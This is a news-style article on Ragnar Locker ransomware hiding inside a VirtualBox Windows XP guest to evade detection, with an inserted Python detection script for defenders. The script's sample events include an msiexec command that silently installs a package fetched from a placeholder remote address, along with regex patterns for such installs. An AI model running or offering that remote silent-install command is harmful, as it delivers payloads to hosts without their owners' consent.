Ragnar Locker ransomware uses a clever trick to dodge detection. Read on to know more about it…
Ransomware attacks have become fairly common in recent times. Researchers discovered an attack group that deployed highly targeted ransomware running inside a virtualised Windows XP instance to evade detection. What makes this ransomware different from others is that it uses a virtual machine to dodge detection.
The RagnarLocker group is already known for carefully selecting targets, avoiding private users, and instead targeting corporate networks, managed service providers, and government organizations. Now, by adopting new innovative attack vectors, the RagnarLocker adversaries are taking their campaigns to a new level.
The gang behind Ragnar Locker go to such lengths because they target the high-value data of specific organisations and demand ransoms that run into the millions of dollars, according to security firm Sophos. “Like a lot of criminals who conduct similar ‘targeted’ or ‘big game’ ransomware attacks, the Ragnar Locker gang try to avoid detection as they operate inside a victim’s network,” Sophos said in a statement.
UK-based cybersecurity firm Sophos Labs has detected a new attack in which the Ragnar Locker ransomware was deployed inside an Oracle VirtualBox Windows XP virtual machine. The attack payload was a 122 MB installer containing a 282 MB virtual image, which in turn was used to conceal a 49 kB ransomware executable.
“…Like a ghost able to interact with the material world, their [hackers that deploy Ragnar Locker ransomware] virtual machine is tailored per endpoint, so it can encrypt the local disks and mapped network drives on the physical machine, from within the virtual plane and out of the detection realm of most endpoint protection products,” Mark Loman, director of engineering, Threat Mitigation at Sophos said in a statement.
Ragnar Locker works in a tricky way. SophosLabs says that “In the detected attack, the Ragnar Locker actors used a GPO task to execute Microsoft Installer (msiexec.exe), passing parameters to download and silently install a 122 MB crafted, unsigned MSI package from a remote web server.”
Virtual machines are often used to execute malware in a sandboxed environment, but in this case the attackers reverse the situation, using the virtual machine to shield their ransomware from malware scanners. The same detail about the GPO task and the unsigned MSI package was published by Sophos director of engineering for threat mitigation Mark Loman in an advisory.
The MSI package included Sun xVM VirtualBox 3.0.4, released in August 2009, and a stripped-down Windows XP SP3 image called MicroXP 0.82, which in turn contained the Ragnar Locker executable.
As the ransomware encrypts corporate files across the network, the process appears to be carried out by VirtualBox, a legitimate program. “Since the vrun.exe ransomware application runs inside the virtual guest machine, its process and behaviours can run unhindered, because they’re out of reach for security software on the physical host machine,” wrote Loman.
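The delivery chain described above (msiexec fetching and silently installing an unsigned package from a remote web server, then a VirtualBox guest doing the encryption) leaves traces on the host even though the ransomware process itself is invisible to host security software. The following is an added example, not code from the article or from Sophos: a small detection pass over constructed process-creation events that flags msiexec installs from http(s) URLs, and VirtualBox executables launched by an installer or running on a host not approved for a hypervisor. The event field names, the VirtualBox executable names, the allow-list and all sample values are assumptions made for the example.

```python
from __future__ import annotations
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record. Field layout is an assumption modelled
    on typical EDR / Sysmon 'process create' events, not on any real product."""
    host: str
    parent_image: str
    image: str
    cmdline: str


# Placeholder allow-list of hosts where a desktop hypervisor is expected (assumption).
VBOX_ALLOWED_HOSTS = {"dev-lab-03"}

# VirtualBox executable names to watch for (assumed; the article does not list them).
VBOX_IMAGES = {"virtualbox.exe", "vboxheadless.exe", "vboxmanage.exe", "vboxsvc.exe"}

# msiexec "/i <package>" (or "/package") where the package is an http(s) URL:
# the installer is fetched from a remote web server, as in the described attack.
REMOTE_INSTALL = re.compile(r"(?:^|\s)/(?:i|package)\s+https?://", re.IGNORECASE)
# "/q", "/qn", "/qb", ...: msiexec quiet UI levels, i.e. a silent install.
QUIET_INSTALL = re.compile(r"(?:^|\s)/q(?:n|b|r|f)?\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return a list of finding strings for one event (empty if nothing suspicious)."""
    findings: list[str] = []
    image = basename(ev.image)
    parent = basename(ev.parent_image)

    if image == "msiexec.exe" and REMOTE_INSTALL.search(ev.cmdline):
        # Remote package plus silent install is the higher-confidence combination.
        severity = "high" if QUIET_INSTALL.search(ev.cmdline) else "medium"
        findings.append(f"{severity}: msiexec installing a package from a remote URL")

    if image in VBOX_IMAGES:
        if parent == "msiexec.exe":
            # A hypervisor started directly by an installer: the package brought its own VM.
            findings.append("high: VirtualBox launched by msiexec")
        elif ev.host not in VBOX_ALLOWED_HOSTS:
            findings.append("medium: VirtualBox running on a host not approved for it")
    return findings


def scan(events: list[ProcEvent]) -> dict[str, list[str]]:
    """Group findings by host; hosts with no findings are omitted."""
    report: dict[str, list[str]] = {}
    for ev in events:
        hits = classify(ev)
        if hits:
            report.setdefault(ev.host, []).extend(hits)
    return report


# Constructed sample events (not real telemetry; 203.0.113.0/24 is a documentation range).
SAMPLE_EVENTS = [
    ProcEvent("ws01", r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i http://203.0.113.10/pkg/update.msi /q"),
    ProcEvent("ws01", r"C:\Windows\System32\msiexec.exe", r"C:\Temp\vbox\VBoxHeadless.exe",
              r"VBoxHeadless.exe --startvm micro"),
    ProcEvent("ws02", r"C:\Windows\explorer.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\Users\alice\Downloads\7z.msi /qn"),   # local, benign
    ProcEvent("dev-lab-03", r"C:\Windows\explorer.exe",
              r"C:\Program Files\Oracle\VirtualBox\VirtualBox.exe", r"VirtualBox.exe"),  # allowed host
    ProcEvent("fileserver01", r"C:\Windows\explorer.exe", r"D:\tools\VBoxHeadless.exe",
              r"VBoxHeadless.exe --startvm xp"),
]

if __name__ == "__main__":
    for host, hits in scan(SAMPLE_EVENTS).items():
        for hit in hits:
            print(f"{host}: {hit}")
```

In practice the same two signals (msiexec pulling a package from a URL, and a hypervisor appearing where none is deployed) would be fed by real EDR or Sysmon telemetry rather than the inline list; the point is that the host-side installer and hypervisor processes are observable even when the guest's own process is not.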
Ragnar Locker was first spotted in December 2019. Since then, there has been a common pattern visible in the attacks.
In April 2020, the actors behind Ragnar Locker attacked the network of the Portuguese multinational energy giant Energias de Portugal (EDP) and claimed to have stolen 10 TB of sensitive company data, demanding payment of 1,580 BTC and threatening to release the data if the ransom was not paid.
In February 2020, Ragnar Locker specifically targeted remote monitoring and management (RMM) software commonly used by managed service providers (MSPs), such as the popular ConnectWise and Kaseya products, to prevent their attack from being detected and stopped.